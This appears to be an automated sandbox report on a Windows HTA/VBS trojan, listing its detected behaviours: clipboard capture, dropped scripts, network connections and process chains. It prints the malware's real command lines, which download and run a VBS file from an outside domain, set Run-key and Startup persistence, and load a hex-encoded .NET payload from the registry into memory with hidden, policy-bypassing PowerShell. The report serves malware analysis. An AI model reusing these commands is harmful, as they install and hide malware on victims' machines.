Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities

Show sources

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

Potential malicious VBS script found (suspicious strings)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Set bs = CreateObject("ADODB.Stream")	Jump to dropped file

Powershell connects to network

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 23.105.131.191 5478
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 166.62.121.61 443			Jump to behavior

Wscript called in batch mode (surpress errors)

Show sources

Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'

Wscript starts Powershell (via cmd or directly)

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'

Creates mutexes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\RV_MUTEX

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Searches for the Microsoft Outlook file path

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Classification label

Show sources

Source: classification engine

Classification label: mal100.troj.evad.winHTA@49/18@2/3

Creates files inside the user directory

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations

Jump to behavior

Creates temporary files

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\microsoft.vbs

Jump to behavior

Executes visual basic scripts

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','%temp%\microsoft.vbs'); Start '%temp%\microsoft.vbs'

Found command line output

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........3.h........P.S. .C.:.\.U.s.e.r.s.\.S.a.m. .T.a.r.w.e.l.l.\.D.e.s.k.t.o.p.>. ..h............t...B... '.h...h....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........3.h.............3.h......\|.L\|.h.......j '.h...jC.e.L\|.h.............7.h.......h..\|..W@............. '.h...h....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................L......v...................v..0.................Y...................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0............W@........v0..................v..0.....................................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0......................v0..................v..0.....................................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......#....W@........v0..................v..0.....................................#...........d...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......#..............v0..................v..0.....................................#...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......'....W@........v0..................v..0.................&...................'...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......'..............v0..................v..0................./...................'...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......+....W@........v0..................v..0.................=...................+...........\...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......+..............v0..................v..0.................F...................+...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0......./...P.S.C.h.i.l.d.N.a.m.e. . .:. .R.u.n.................U.................../...........$...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0......./..............v0..................v..0.................^.................../...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......3...P.S.D.r.i.v.e. . . . . . .:. .H.K.C.U...............m...................3...........&...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......3..............v0..................v..0.................v...................3...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......7....W@........v0..................v..0.....................................7...........b...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......7..............v0..................v..0.....................................7...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......;....W@........v0..................v..0.....................................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......;..............v0..................v..0.....................................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................?.......@......v...................v..0.....................................?.......\|.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........L.......C..............vL..................v..0.....................................C.......,.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........L.......G..............vL..................v..0.....................................G.......,.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............d...G...P.S. .C.:.\.U.s.e.r.s.\.S.a.m. .T.a.r.w.e.l.l.\.D.e.s.k.t.o.p.>. .......G.......d...B...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........3.h\|.......P.S. .C.:.\.U.s.e.r.s.\.S.a.m. .T.a.r.w.e.l.l.\.D.e.s.k.t.o.p.>. ..h..\|.P.......d...B... '.h...h....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........3.h........P.S. .C.:.\.U.s.e.r.s.\.S.a.m. .T.a.r.w.e.l.l.\.D.e.s.k.t.o.p.>. ..hH.\|.P*/.........B... '.h...h....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........3.h.............3.h......;.L\|.h.......j '.h...j.n!.L\|.h.............7.h.......h..;...@............. '.h...h....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................L......v...................v..0.........0...D.......................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.............@........v0..................v..0.........0...D...*...................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0......................v0..................v..0.........0...D...3...................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......#.....@........v0..................v..0.........0...D...A...................#...........d...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......#..............v0..................v..0.........0...D...J...................#...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......'.....@........v0..................v..0.........0...D.......................'...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......'..............v0..................v..0.........0...D.......................'...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......+.....@........v0..................v..0.........0...D.......................+...........\...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......+..............v0..................v..0.........0...D.......................+...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0......./...P.S.C.h.i.l.d.N.a.m.e. . .:. .R.u.n.........0...D......................./...........$...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0......./..............v0..................v..0.........0...D......................./...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......3...P.S.D.r.i.v.e. . . . . . .:. .H.K.C.U.......0...D.......................3...........&...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......3..............v0..................v..0.........0...D.......................3...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......7.....@........v0..................v..0.........0...D.......................7...........b...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......7..............v0..................v..0.........0...D.......................7...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......;.....@........v0..................v..0.........0...D.......................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........0.......;..............v0..................v..0.........0...D.......................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................?.......@......v...................v..0.........0...D...)...................?.......\|.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........L.......C..............vL..................v..0.........0...D...6...................C.......,.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........L.......G..............vL..................v..0.........0...D...C...................G.......,.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................G...h.5.H......v...................v..0.........0...D...Q...................G...........R...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........3.h.............3.h......#.L\|.h.......j '.h...jg^..L\|.h.............7.h.......h..#.`.3............. '.h...h....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........3.h....#........3.h....P.<.L\|.h.......j '.h...j....L\|.hd............7.h.......hP.<...J............. '.h...h....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...#.....J.x......v...................v..0.........L...(...Y...................#...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l.../.....J.8......v...................v..0.........L...(......................./...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l.../.....J.x......v...................v..0.........L...(......................./...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...;...e.i.n.g. .u.s.e.d. .b.y. .a.n.o.t.h.e.r. .p.r.o.c.e.s.s...".............;.......t...<...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...;.....J.x......v...................v..0.........L...(.......................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...G...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.1.0.........L...8.......................G.......t...$...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...G.....J.x......v...................v..0.........L...8...)...................G...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...S.....J.8......v...................v..0.........L...8...Q...................S...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...S.....J.x......v...................v..0.........L...8...l...................S...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l..._.....J.8......v...................v..0.........L...8......................._...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l..._.....J.x......v...................v..0.........L...8......................._...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...k...c.r.o.s.o.f.t...v.b.s.'.).)....v..0.........L...8.......................k.......t.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...k.....J.x......v...................v..0.........L...8.......................k...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...w.....J.8......v...................v..0.........L...8.......................w...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l...w.....J.x......v...................v..0.........L...8...5...................w...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l.........J.8......v...................v..0.........L...8...]...............................f...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l.........J.x......v...................v..0.........L...8...x...................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l....... .J.8......v...................v..0.........L...8...............................t.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............l.........J.x......v...................v..0.........L...8.......................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........$...........0HE........v$..................v..0.........L...8...................................R...>..v........

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
